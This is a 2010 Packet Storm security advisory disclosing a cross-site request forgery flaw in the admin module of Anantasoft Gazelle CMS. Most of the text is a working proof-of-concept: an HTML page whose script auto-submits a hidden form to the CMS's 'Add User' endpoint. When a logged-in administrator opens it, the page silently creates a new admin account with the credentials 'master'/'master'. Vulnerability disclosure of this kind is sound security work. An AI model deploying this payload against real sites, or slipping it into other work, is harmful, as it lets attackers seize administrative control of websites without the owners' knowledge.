Anantasoft Gazelle CMS Cross Site Request Forgery

2010-03-10T00:00:00
ID PACKETSTORM:87088
Type packetstorm
Reporter Pratul Agrawal
Modified 2010-03-10T00:00:00

Description

                                        
                                            ` =======================================================================  
  
Anantasoft Gazelle CMS CSRF Vulnerability  
  
=======================================================================  
  
by  
  
Pratul Agrawal  
  
  
  
# Vulnerability found in- Admin module  
  
# email Pratulag@yahoo.com  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Software Anantasoft_Gazelle_CMS  
  
# Category CMS / Portals  
  
# Site p4ge http://www.opensourcecms.com/demo/2/193/Anantasoft_Gazelle_CMS  
  
# Plateform php  
  
  
  
# Proof of concept #  
  
Targeted URL: http://server/demo/2/193/Anantasoft_Gazelle_CMS  
  
  
Script to Add the Admin user through Cross Site request forgery  
  
. ................................................................................................................  
  
<html>  
  
<body>  
  
<form name="XYZ" action="http://demo.opensourcecms.com/gazelle/admin/index.php?Users/Add%20User" method="post">  
  
<input type=hidden name="name" value="master">  
  
<input type=hidden name="pass" value="master">  
  
<input type=hidden name="controle" value="master">  
  
<input type=hidden name="email" value="master%40yahoo.com">  
  
<input type=hidden name="active" value="on">  
  
<input type=hidden name="showemail" value="on">  
  
<input type=hidden name="admin%5B%5D" value="2">  
  
<input type=hidden name="save" value="Add">  
  
<input type=hidden name="table" value="users">  
  
<input type=hidden name="joindate" value="2010-03-10+04%3A04%3A36">  
</form>  
  
<script>  
  
document.XYZ.submit();  
  
</script>  
  
</body>  
  
</html>  
  
. ..................................................................................................................  
  
  
  
After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege.  
  
  
#If you have any questions, comments, or concerns, feel free to contact me.  
  
`